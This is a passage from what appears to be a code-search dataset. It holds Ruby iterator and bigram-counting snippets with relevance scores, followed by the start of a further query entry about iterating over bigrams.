key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def my_map\n array = []\n self.my_each do |word|\n array << yield(word)\n end\n return array\n end",
"def each\r\n assert_exists\r\n arr_cells = cells\r\n for i in 0..arr_cells.length - 1 do\r\n yield arr_cells[i]\r\n end\r\n end",
"def next_iteration\n morpheme_hypotheses = hypothesize_morphemes\n return [] if morpheme_hypotheses.empty?\n equivalence_classes = collect_morpheme_hypotheses(morpheme_hypotheses)\n new_morphemes = equivalence_classes.new_morphemes\n insert_morphemes_into_analyses(new_morphemes)\n end",
"def _each\n Engine.new(local_copy.encoded_io, csv_options.merge(headers: headers)).each do |row|\n\n some_value_present = false\n\n if not headers\n\n # represent the row as an array\n array = row.map do |v|\n v = RemoteTable.normalize_whitespace v\n if not some_value_present and not keep_blank_rows and v.present?\n some_value_present = true\n end\n v\n end\n if some_value_present or keep_blank_rows\n yield array\n end\n\n else\n\n # represent the row as a hash\n hash = ::ActiveSupport::OrderedHash.new\n row.each do |k, v|\n v = RemoteTable.normalize_whitespace v\n if not some_value_present and not keep_blank_rows and v.present?\n some_value_present = true\n end\n hash[k] = v\n end\n if some_value_present or keep_blank_rows\n yield hash\n end\n\n end\n end\n ensure\n local_copy.cleanup\n end",
"def pangram_search(words, &block)\n # Bust out if we've found enough pangrams\n raise AllDone.new if @max_count != 0 && @count > @max_count\n \n h = LetterHistogram.new words\n\n # If we already have more words or more repeats, then no need to look any\n # further, we should backtrack and try something else.\n return if words.size >= @min_size && h.repeats >= @min_repeats\n\n # This pangram is somehow minimal, so pass to the block\n if h.pangram?\n @min_size = words.size if words.size < @min_size\n @min_repeats = h.repeats if h.repeats < @min_repeats\n @count += 1\n yield words,h\n return\n end\n\n # No pangram yet, find children and descend\n new_words = @word_letters.least_common words,h\n new_words.each {|w| pangram_search words + [w], &block}\n end",
"def all_traversals(word)\n length = word.length\n results = []\n\n results << row_up(length)\n results << up_right(length)\n results << col_right(length)\n results << down_right(length)\n results << row_down(length)\n results << down_left(length)\n results << col_left(length)\n results << up_left(length)\n\n results\n end",
"def each\n @gens.each { |g| g.rewind }\n\n loop do\n count = 0\n\n ret = @gens.map { |g|\n if g.end?\n count += 1\n nil\n else\n g.next\n end\n }\n\n if count == @gens.size\n break\n end\n\n yield ret\n end\n\n self\n end",
"def each_pair\n return to_enum(__method__) { @table.size } unless block_given?\n @table.each_pair{|p| yield p}\n end",
"def each\n yield \"pizza\"\n yield \"spagetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def each\r\n assert_exists\r\n arr_rows = rows\r\n for i in 0..arr_rows.length - 1 do\r\n yield arr_rows[i]\r\n end\r\n end",
"def word_search_board\n @grid.each do |r|\n puts r.map { |p| p }.join(\" \")\n end\n end",
"def pbEachPokemon\n for i in -1...$PokemonStorage.maxBoxes\n for j in 0...$PokemonStorage.maxPokemon(i)\n poke = $PokemonStorage[i][j]\n yield(poke,i) if poke\n end\n end\nend",
"def each_row\n @board.each do |row|\n yield row\n end\n end",
"def each &bloque\n # itera sobre todos los hijos de cada nodo\n # retorna cada hijo utilizando yield\n for elem in @hijos\n \tif (elem != nil)\n \tyield elem\n end\n end\n end",
"def each!\r\n each do |item, i, j|\r\n @table[i][j] = yield(@table[i][j], i, j) || @table[i][j]\r\n end\r\n\r\n self # Chainability! Yay!\r\n end",
"def times_table(rows)\n if rows > 0\n array = (1..rows).to_a\n\n i = 1\n while i <= rows\n puts array.map {|e| \"#{e*i} \"}.join(' ')\n i += 1\n end\n end\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def index\n\t\t@antibiograms = Antibiogram.all\n\tend",
"def times_table(rows)\n 1.upto(rows) do |y|\n puts\n 1.upto(rows) { |x| print \"#{x * y} \"}\n end\nend",
"def each\n @cols.length.times do |i|\n @rows.length.times do |j|\n yield [i, j]\n end\n end\n end",
"def ngrams(len = 1)\n ngrams = []\n len = size if len > size\n (0..size - len).each do |n|\n ng = self[n...(n + len)]\n ngrams.push(ng)\n yield ng if block_given?\n end\n ngrams\n end",
"def each_row\n end",
"def mostrar_tablero(tablero)\r\n for i in (0...3)\r\n for j in (0...3)\r\n print tablero[i][j]\r\n\t\t\tprint \" \"\r\n\t\tend\r\n\t\tprint \"\\n\"\r\n\tend\r\nend",
"def busca_n_gramas(indice_)\n encontrados = Array.new\n tamano_texto = @texto.length\n n_gramas = @texto.clone\n if indice_ > 7 || indice_ < 2\n puts \"Solo puedo darte de 2 a 7 -gramas\"\n return\n end\n arreglo = frecuencias(false)\n 10.times do |i|\n frecuen = arreglo[i]\n letra = frecuen[0]\n caracter = letra.dup\n j = 0\n sig = nil\n ant = nil\n while true\n en_texto = \"\" << n_gramas[j]\n if caracter.eql?(en_texto)\n sig = n_gramas[j...j+indice_]\n ant = n_gramas[j+1-indice_..j]\n rep_s = n_gramas.scan(sig).size\n rep_a = n_gramas.scan(ant).size\n if rep_s > 2\n salida = sig + \" -- \" + rep_s.to_s\n salida2 = ant + \" -- \" + rep_a.to_s\n puts salida\n puts salida2\n end\n break\n end#if\n j = j.succ \n end#e while\n end\n return encontrados\n end",
"def each\n\t\t@array.each do |v|\n\t\t\tyield v & 0x0F #Bottom Nibble\n\t\t\tyield (v >> 4) & 0x0F #Top Nibble\n\t\tend\n\tend",
"def each\n return to_enum(:each) unless block_given?\n @grid.each do |sub|\n sub.each do |cell|\n yield cell\n end\n end\n end",
"def each(&block)\n return enum_for :each unless block\n\n %x{\n for (var i = 0, length = #@native.rows.length; i < length; i++) {\n #{block.call(self[`i`])};\n }\n }\n\n self\n end",
"def each\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def each\n @cells.each_with_index do |row, ir|\n row.each_with_index do |val, ic|\n yield ir, ic, val\n end\n end\n end",
"def each\n\t\tyield \"piaza\"\n\t\tyield \"spaghetti\"\n\t\tyield \"salad\"\n\t\tyield \"water\"\n\tend",
"def through; end",
"def each\n return unless @result\n\n @result.each(as: :hash, symbolize_keys: true) do |row|\n next unless row # This sometimes happens when streaming results...\n row = Hash[row.map { |k, v| [k, v.to_s] }] if @type_translation == :string\n yield row\n end\n end",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each\n nodo1 = @lista_alimentos.head\n nodo2 = @gramos.head\n while (nodo1 != nil && nodo2 != nil)\n yield nodo1.value\n nodo1 = nodo1.next\n nodo2 = nodo2.next\n end\n end",
"def each\n page = INDEX.result binding\n # strip space. This regex from http://stackoverflow.com/a/8828408/327815\n page.gsub!(%r%(?<=[\\^])\\t{2,}|(?<=[>])\\s{2,}(?=[<])|(?<=[>])\\s{2,11}(?=[<])|(?=[\\n])\\s{2,}%,\"\")\n page.each_line{|l| yield l }\n end",
"def each_table(&block)\n if block_given?\n @tables.each_value(&block)\n self\n else\n @tables.values\n end\n end",
"def iterateCrawlerTable\n step_size = 15\n (0..getCrawlerCount).step(step_size) do |i|\n db.execute(\"SELECT * FROM #{@crawlerTable} LIMIT #{step_size} OFFSET #{i}\").each do |beer|\n yield BeerModel.new(beer)\n end\n end\n end",
"def each\n # Include every to be inside enumerable:\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"water\"\n yield \"bread\"\n end",
"def display_board\n for row in $game_board\n for square in row\n print square ? square.to_s + \" \" : \". \" \n end\n puts\n end\nend"
] | [
"0.8577058",
"0.6344053",
"0.62939036",
"0.6023376",
"0.596464",
"0.58545655",
"0.5687088",
"0.5656885",
"0.56529105",
"0.56384695",
"0.5635767",
"0.5621293",
"0.560591",
"0.55842483",
"0.5555778",
"0.5555002",
"0.5549917",
"0.5517773",
"0.54879624",
"0.5455607",
"0.538293",
"0.5358634",
"0.5322199",
"0.5318279",
"0.5318279",
"0.53157806",
"0.5307401",
"0.5284725",
"0.5264827",
"0.5212416",
"0.5203092",
"0.51916486",
"0.5190926",
"0.51691586",
"0.5133269",
"0.5128264",
"0.51107335",
"0.509738",
"0.5094853",
"0.50930786",
"0.50349474",
"0.5026363",
"0.5017952",
"0.50140476",
"0.50135195",
"0.5006762",
"0.4985794",
"0.49832347",
"0.49755543",
"0.49627286",
"0.49574012",
"0.49556914",
"0.49515814",
"0.49507564",
"0.4947123",
"0.49459827",
"0.49458402",
"0.49436402",
"0.49429289",
"0.4933273",
"0.4929251",
"0.49221265",
"0.4920323",
"0.4916641",
"0.4913231",
"0.49040157",
"0.4901646",
"0.48988977",
"0.4898279",
"0.4896985",
"0.48949555",
"0.48910946",
"0.48851874",
"0.48826596",
"0.4879796",
"0.48694566",
"0.48662248",
"0.48643574",
"0.48640466",
"0.4858124",
"0.48575848",
"0.48478484",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.48435172",
"0.4840127",
"0.48390204",
"0.48334554",
"0.483021",
"0.482508",
"0.48182508"
] | 0.49693602 | 50 |
Iterate over each bigram as an instance of Bigram. | def each
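# @table maps [word1, word2] pairs to Bigram objects; only the Bigram is yielded.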
@table.each do |pair, bigram|
yield(bigram)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def load_bigrams\n bigrams = []\n\n begin\n sql = \"SELECT bigram_id, word1, word2, count FROM Bigrams;\"\n stm = @db.prepare sql\n rs = stm.execute\n\t\t while (row = rs.next) do\n\t\t id, w1, w2, c = *row\n\t\t bigrams << Bigrams.new(w1, w2, :count=>c, :id=>id)\n\t\t end\n ensure\n stm.close\n end\n\n begin \n sql = \"SELECT file_path, file_count FROM BigramFiles WHERE bigram_id = ?\"\n stm = @db.prepare sql\n\n\t\t bigrams.each do |b|\n\t\t rs = stm.execute(b.id)\n\t\t files = {}\n\t\t while (row = rs.next) do\n\t\t path, count = *row\n\t\t files[path] = count\n\t\t end\n\t\t b.files = files\n\t\t end\n ensure\n stm.close\n end\n\n return bigrams\n end",
"def scan\n $stderr.print \"[bigrams] \"\n\n last = nil\n\n bigram_files.each do |file|\n $stderr.print \".\"\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t if last && good_bigram?(word)\n add(last, word, file)\n\t\t end\n\t\t last = word\n else\n last = nil\n end\n end\n last = nil\n end\n last = nil\n end\n\n $stderr.puts\n end",
"def n_gramas\n for i in 2...8\n busca_n_gramas(i)\n end\n end",
"def gen_bigrams(a)\n bigrams = a.zip(a[1..-1])\n bigrams.pop # remove last useless one [lastitem, nil]\n return bigrams\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def each\n @gens.each { |g| g.rewind }\n\n loop do\n count = 0\n\n ret = @gens.map { |g|\n if g.end?\n count += 1\n nil\n else\n g.next\n end\n }\n\n if count == @gens.size\n break\n end\n\n yield ret\n end\n\n self\n end",
"def each_gram(&block)\n @frequencies.each_key(&block)\n end",
"def each &block\n enumerator = Enumerator.new do |words|\n words << as_word if terminal?\n children.each { |child| child.each { |word| words << word } }\n end\n\n block.nil? ? enumerator : enumerator.each(&block)\n end",
"def each\n # Include every to be inside enumerable:\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"water\"\n yield \"bread\"\n end",
"def load_bigrams(filename)\n #puts filename\n CSV.foreach(filename, :headers=>true) do |row|\n bigram = row['bigram']\n bigram.gsub!(' ','_')\n @bigrams << bigram\n end\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def yield_ngrams(str, ngram_size=@ngram_size)\n ngram_list = ngram_list(str, ngram_size)\n ngram_list.each { |ngram| yield ngram }\n end",
"def each\n yield \"pizza\"\n yield \"spagetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def each\n yield \"pizza\"\n yield \"spaghetti\"\n yield \"salad\"\n yield \"bread\"\n yield \"water\"\n end",
"def each\n @length.times {|i|\n yield @gens.collect {|x| x[i]}\n }\n self\n end",
"def next_iteration\n morpheme_hypotheses = hypothesize_morphemes\n return [] if morpheme_hypotheses.empty?\n equivalence_classes = collect_morpheme_hypotheses(morpheme_hypotheses)\n new_morphemes = equivalence_classes.new_morphemes\n insert_morphemes_into_analyses(new_morphemes)\n end",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def each\n return enum_for :each unless block_given?\n\n yield as_word if terminal?\n\n children_tree.each_value do |child|\n child.each do |word|\n yield word\n end\n end\n\n self\n end",
"def each( )\n\t\t\tsquares = (\"a\"..\"h\").map do |file|\n\t\t\t\t(1..8).map { |rank| \"#{file}#{rank}\" }\n\t\t\tend.flatten.each do |square|\n\t\t\t\tyield [square, @squares[square]]\n\t\t\tend\n\t\tend",
"def all_bams\n bm = Bam.select('id, model, code').where(state: 'catalog').uniq(&:code)\n # Format to show in view\n bam = bm.map { |m| [m.model, m.model] }\n return bam\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def each\n\t\tyield \"piaza\"\n\t\tyield \"spaghetti\"\n\t\tyield \"salad\"\n\t\tyield \"water\"\n\tend",
"def ngrams(len = 1)\n ngrams = []\n len = size if len > size\n (0..size - len).each do |n|\n ng = self[n...(n + len)]\n ngrams.push(ng)\n yield ng if block_given?\n end\n ngrams\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def each\n while nextperm\n yield indices.map { |i| alphabet[i] }\n end\n end",
"def each\n to_a.each\n end",
"def each\n to_a.each\n end",
"def each\n to_a.each\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def each\n words.each { |word| yield(word) }\n end",
"def each\n words.each { |word| yield( word ) }\n end",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def each\r\n # Cache to ensure unprocessed quad's native faces doesn't return twice.\r\n skip = {}\r\n for entity in all\r\n if entity.is_a?( Sketchup::Face )\r\n next if skip[ entity ]\r\n if quad = @faces_to_quads[ entity ]\r\n # Existing Quad\r\n for face in quad.faces\r\n skip[ face ] = face\r\n end\r\n yield( quad )\r\n elsif QuadFace.is?( entity )\r\n # Unprocessed Quad\r\n quad = QuadFace.new( entity )\r\n cache_entity( quad )\r\n for face in quad.faces\r\n skip[ face ] = face\r\n end\r\n yield( quad )\r\n else\r\n # Native Face\r\n cache_entity( entity )\r\n yield( entity )\r\n end\r\n else\r\n # All other entities\r\n cache_entity( entity )\r\n yield( entity )\r\n end\r\n end\r\n end",
"def each\n @table.each do |_, word|\n yield(word)\n end\n end",
"def my_map\n array = []\n self.my_each do |word|\n array << yield(word)\n end\n return array\n end",
"def each\n self.to_a.each do |el|\n yield(el)\n end\n end",
"def each() @symbols.each {|s| yield s if block_given? } end",
"def each_family\n @ks[:family].each do |k,v|\n yield k\n end\n end",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def each(&block); end",
"def create_ramfs\n super\n end",
"def each(*) end",
"def each\n @type_variants.values.each { |tv| tv.each { |t| yield t } }\n end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each; end",
"def each\n entry_length = struct_class_length\n (length / entry_length).times do |i|\n yield self[i]\n end\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def draw_bombs bombs\r\n bombs.each do |bomb|\r\n draw_bomb(bomb)\r\n end\r\nend",
"def each_term\n\t\t\tself.to_terms.each do |term|\n\t\t\t\tyield term.stem\n\t\t\tend\n\t\tend",
"def iterate\n raise \"You should implement this\"\n end",
"def each\n @children.each {|child| yield child}\n end",
"def each_v1\n words.each { |word| yield(word) }\n end",
"def each\n @children.each { |child| yield child }\n end",
"def each()\n self.to_a.each { |elt| yield elt }\n end",
"def each\n yield self\n end",
"def index\n\t\t@antibiograms = Antibiogram.all\n\tend",
"def each\r\n @many = true\r\n yield(self)\r\n end",
"def each # And define each on top of next\n loop {yield self.next }\n end",
"def each()\n hijos.each() do |v|\n yield v\n end\n end",
"def each\n yield self[0]\n yield self[1]\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\n\t\t\ttitle = cleanup_title(line)\n\t\t\t# If the title is valid continue\n\t\t\tif title != nil\n\t\t\t\t# Split the title into words\n\t\t\t\twords = title.split(\" \")\n\t\t\t\tw_index = 0\n\t\t\t\t# Remove the stop words\n\t\t\t\twords = words - %w{a an and by for from in of on or out the to with}\n\t\t\t\t# If there is more than one word in a title add to biagram\n\t\t\t\tif words.length > 1\n\t\t\t\t\twords.each do |w|\n\t\t\t\t\t\t# If there is no base word add it\n\t\t\t\t\t\tif $bigrams[w] == nil\n\t\t\t\t\t\t\t$bigrams[w] = Hash.new\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else if there is no word following the word add it\n\t\t\t\t\t\telsif $bigrams[w][words[w_index + 1]] == nil\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] = 1\n\t\t\t\t\t\t# Else increment the count of the word following\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\t$bigrams[w][words[w_index + 1]] += 1\n\t\t\t\t\t\tend\n\t\t\t\t\t\tw_index += 1\n\t\t\t\t\t\t# Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t 